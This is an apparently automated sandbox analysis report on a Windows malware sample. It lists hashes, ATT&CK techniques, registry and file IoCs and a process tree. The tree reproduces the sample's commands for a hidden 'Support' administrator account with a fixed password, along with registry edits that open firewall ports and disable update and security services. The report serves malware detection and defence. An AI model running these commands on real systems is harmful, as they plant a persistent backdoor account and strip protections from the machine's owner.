90791494c097ef09615aadcb8d6dde088e400f2d9b38bb6aef6a2c3d040b6ae2

Analysis

max time kernel
149s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-11-2024 05:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
Size

1.5MB
MD5

b4eab841d58d4dcd43923fc74e3613bb
SHA1

7245a6bc53f54fc0b42d62dbe0b9d0d64e0c5e83
SHA256

90791494c097ef09615aadcb8d6dde088e400f2d9b38bb6aef6a2c3d040b6ae2
SHA512

9d1042ebb4c2243babe658bdbcba7037a83a2da35ace6126924693b9b83b52dd9a1aaffa4b5804a4b111e1225a0dbf88d5ee81ad0e74e9a30a197333b71c4a16
SSDEEP

24576:fuNsvr8JXe4Di92MwUg38+8jX3V5qXYRmGnBia9fTi0gK8u5aPbOrddnNvfe:k7LMbR+8r3oYRfflRaP6dRRfe

Score

10^/10

defense_evasion discovery evasion upx

Malware Config

Signatures

Modifies firewall policy service 3 TTPs 11 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\112:TCP = "112:TCP:*:Enabled"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\112:TCP = "112:UDP:*:Enabled"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3789:TCP = "3789:TCP:*:Enabled"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3789:TCP = "3789:UDP:*:Enabled"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List	regedit.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1252	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe

Executes dropped EXE 18 IoCs

pid	Process
3308	Run.exe
2660	javavm.exe
4732	sc.exe
5016	sc.exe
4112	sc.exe
900	sc.exe
2748	sc.exe
4344	rgv.exe
2840	rgv.exe
4568	rgv.exe
2708	rgv.exe
3860	rgv.exe
4788	xnet.exe
2240	xnet.exe
4508	javavm.exe
440	xnet.exe
4432	xnet.exe
372	kill.exe

Loads dropped DLL 5 IoCs

pid	Process
4508	javavm.exe
4508	javavm.exe
4508	javavm.exe
4508	javavm.exe
4508	javavm.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\v:	cmd.exe
File opened (read-only)	\??\y:	cmd.exe
File opened (read-only)	\??\e:	cmd.exe
File opened (read-only)	\??\m:	cmd.exe
File opened (read-only)	\??\s:	cmd.exe
File opened (read-only)	\??\u:	cmd.exe
File opened (read-only)	\??\w:	cmd.exe
File opened (read-only)	\??\x:	cmd.exe
File opened (read-only)	\??\j:	cmd.exe
File opened (read-only)	\??\k:	cmd.exe
File opened (read-only)	\??\n:	cmd.exe
File opened (read-only)	\??\r:	cmd.exe
File opened (read-only)	\??\t:	cmd.exe
File opened (read-only)	\??\h:	cmd.exe
File opened (read-only)	\??\l:	cmd.exe
File opened (read-only)	\??\o:	cmd.exe
File opened (read-only)	\??\q:	cmd.exe
File opened (read-only)	\??\g:	cmd.exe
File opened (read-only)	\??\i:	cmd.exe
File opened (read-only)	\??\p:	cmd.exe
File opened (read-only)	\??\z:	cmd.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Support = "0"	regedit.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3304-0-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/3304-83-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/4344-129-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/files/0x0007000000023ca9-128.dat	upx
behavioral2/memory/4344-131-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/2840-133-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/4568-136-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/2708-138-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/3860-141-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/files/0x0007000000023ca8-209.dat	upx
behavioral2/memory/372-210-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/372-212-0x0000000000400000-0x000000000041B000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Java\classes\tray.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\ts1.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\bin\JavaVM.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\Run.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\java.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\nio.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\NPJava11.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\javavm.bat	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\hpi.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\~DF2BDFB9CE.tmp	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\bin	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\jpicpl32.cpl	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\~DF1BDFB9CF.tmp	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\bin\jcov.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\	javavm.exe
File opened for modification	C:\Windows\Java\classes\tray.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\bin\jawt.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\javavm.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jpicpl32.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\jpicpl32.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\fw1.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\javaw.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jusched.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\NPJava12.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jpicpl32.cpl	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\fw2.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\java.ocx	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\java.ocx	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\jawt.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\NPJava11.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\xnet.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\kill.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\sc.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\sc.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\ts1.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\javavm.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jpicpl32.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\rgv.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\fw2.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\jusched.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\telnet.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\~DF1BDFB9CF.tmp	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\Run.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\rmi.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\java.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\hide.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\TS.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\bin\jcov.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\java.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\javaw.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\rgv.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\java.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\kill.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\bin\JavaVM.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\jpicpl32.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\fw1.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\javavm.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\javavm.bat	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\javavm.reg	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jucheck.exe	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\hpi.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File created	C:\Windows\Java\classes\jawt.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
File opened for modification	C:\Windows\Java\classes\nio.dll	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4112	sc.exe
900	sc.exe
2748	sc.exe
4732	sc.exe
5016	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javavm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javavm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rgv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xnet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rgv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

System Time Discovery 1 TTPs 2 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
3648	net.exe
5112	net1.exe

Runs .reg file with regedit 10 IoCs

pid	Process
4952	regedit.exe
2108	regedit.exe
1588	regedit.exe
4440	regedit.exe
2532	regedit.exe
3384	regedit.exe
2364	regedit.exe
704	regedit.exe
1564	regedit.exe
404	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4508	javavm.exe
4508	javavm.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe
372	kill.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	372	kill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3308	Run.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3304 wrote to memory of 3308	3304	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe	83
PID 3304 wrote to memory of 3308	3304	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe	83
PID 3304 wrote to memory of 3308	3304	b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe	83
PID 3308 wrote to memory of 1644	3308	Run.exe	84
PID 3308 wrote to memory of 1644	3308	Run.exe	84
PID 3308 wrote to memory of 1644	3308	Run.exe	84
PID 1644 wrote to memory of 704	1644	cmd.exe	86
PID 1644 wrote to memory of 704	1644	cmd.exe	86
PID 1644 wrote to memory of 704	1644	cmd.exe	86
PID 1644 wrote to memory of 2660	1644	cmd.exe	87
PID 1644 wrote to memory of 2660	1644	cmd.exe	87
PID 1644 wrote to memory of 2660	1644	cmd.exe	87
PID 1644 wrote to memory of 3648	1644	cmd.exe	88
PID 1644 wrote to memory of 3648	1644	cmd.exe	88
PID 1644 wrote to memory of 3648	1644	cmd.exe	88
PID 3648 wrote to memory of 5112	3648	net.exe	89
PID 3648 wrote to memory of 5112	3648	net.exe	89
PID 3648 wrote to memory of 5112	3648	net.exe	89
PID 1644 wrote to memory of 4928	1644	cmd.exe	90
PID 1644 wrote to memory of 4928	1644	cmd.exe	90
PID 1644 wrote to memory of 4928	1644	cmd.exe	90
PID 4928 wrote to memory of 4488	4928	net.exe	91
PID 4928 wrote to memory of 4488	4928	net.exe	91
PID 4928 wrote to memory of 4488	4928	net.exe	91
PID 1644 wrote to memory of 4920	1644	cmd.exe	92
PID 1644 wrote to memory of 4920	1644	cmd.exe	92
PID 1644 wrote to memory of 4920	1644	cmd.exe	92
PID 4920 wrote to memory of 4184	4920	net.exe	93
PID 4920 wrote to memory of 4184	4920	net.exe	93
PID 4920 wrote to memory of 4184	4920	net.exe	93
PID 1644 wrote to memory of 1856	1644	cmd.exe	94
PID 1644 wrote to memory of 1856	1644	cmd.exe	94
PID 1644 wrote to memory of 1856	1644	cmd.exe	94
PID 1856 wrote to memory of 2960	1856	net.exe	95
PID 1856 wrote to memory of 2960	1856	net.exe	95
PID 1856 wrote to memory of 2960	1856	net.exe	95
PID 1644 wrote to memory of 4992	1644	cmd.exe	96
PID 1644 wrote to memory of 4992	1644	cmd.exe	96
PID 1644 wrote to memory of 4992	1644	cmd.exe	96
PID 4992 wrote to memory of 2892	4992	net.exe	97
PID 4992 wrote to memory of 2892	4992	net.exe	97
PID 4992 wrote to memory of 2892	4992	net.exe	97
PID 1644 wrote to memory of 4668	1644	cmd.exe	98
PID 1644 wrote to memory of 4668	1644	cmd.exe	98
PID 1644 wrote to memory of 4668	1644	cmd.exe	98
PID 4668 wrote to memory of 3540	4668	net.exe	99
PID 4668 wrote to memory of 3540	4668	net.exe	99
PID 4668 wrote to memory of 3540	4668	net.exe	99
PID 1644 wrote to memory of 436	1644	cmd.exe	100
PID 1644 wrote to memory of 436	1644	cmd.exe	100
PID 1644 wrote to memory of 436	1644	cmd.exe	100
PID 436 wrote to memory of 4900	436	net.exe	101
PID 436 wrote to memory of 4900	436	net.exe	101
PID 436 wrote to memory of 4900	436	net.exe	101
PID 1644 wrote to memory of 3508	1644	cmd.exe	102
PID 1644 wrote to memory of 3508	1644	cmd.exe	102
PID 1644 wrote to memory of 3508	1644	cmd.exe	102
PID 3508 wrote to memory of 4664	3508	net.exe	103
PID 3508 wrote to memory of 4664	3508	net.exe	103
PID 3508 wrote to memory of 4664	3508	net.exe	103
PID 1644 wrote to memory of 1252	1644	cmd.exe	104
PID 1644 wrote to memory of 1252	1644	cmd.exe	104
PID 1644 wrote to memory of 1252	1644	cmd.exe	104
PID 1644 wrote to memory of 1564	1644	cmd.exe	105

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1252	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3304
- C:\Windows\Java\classes\Run.exe
  "C:\Windows\Java\classes\Run.exe" -h javavm.bat
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c javavm.bat
    3⤵
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s javavm.reg
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:704
  - - C:\Windows\Java\classes\javavm.exe
      C:\Windows\Java\classes\javavm.exe -i
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2660
  - - C:\Windows\SysWOW64\net.exe
      net user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES
      4⤵
      System Location Discovery: System Language Discovery
      System Time Discovery
      Suspicious use of WriteProcessMemory
      PID:3648
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES
        5⤵
        System Location Discovery: System Language Discovery
        System Time Discovery
        
        PID:5112
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administrators Support /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators Support /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4488
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administrators Support /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators Support /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4184
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administratoren Support /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1856
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administratoren Support /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administrat÷rer Support /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4992
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrat÷rer Support /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2892
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administradores Support /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4668
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administradores Support /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3540
  - - C:\Windows\SysWOW64\net.exe
      net user Support /comment:"Built-in account for administering the computer/domain"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Support /comment:"Built-in account for administering the computer/domain"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4900
  - - C:\Windows\SysWOW64\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3508
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4664
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h C:\docume~1\Support
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1252
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s hide.reg
      4⤵
      Hide Artifacts: Hidden Users
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:1564
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s fw1.reg
      4⤵
      Modifies firewall policy service
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:404
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s fw2.reg
      4⤵
      Modifies firewall policy service
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:2108
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s telnet.reg
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:1588
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s kill.reg
      4⤵
      Modifies security service
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:4440
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s tray.reg
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:4952
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s TS.reg
      4⤵
      System Location Discovery: System Language Discovery
      Runs .reg file with regedit
      PID:2532
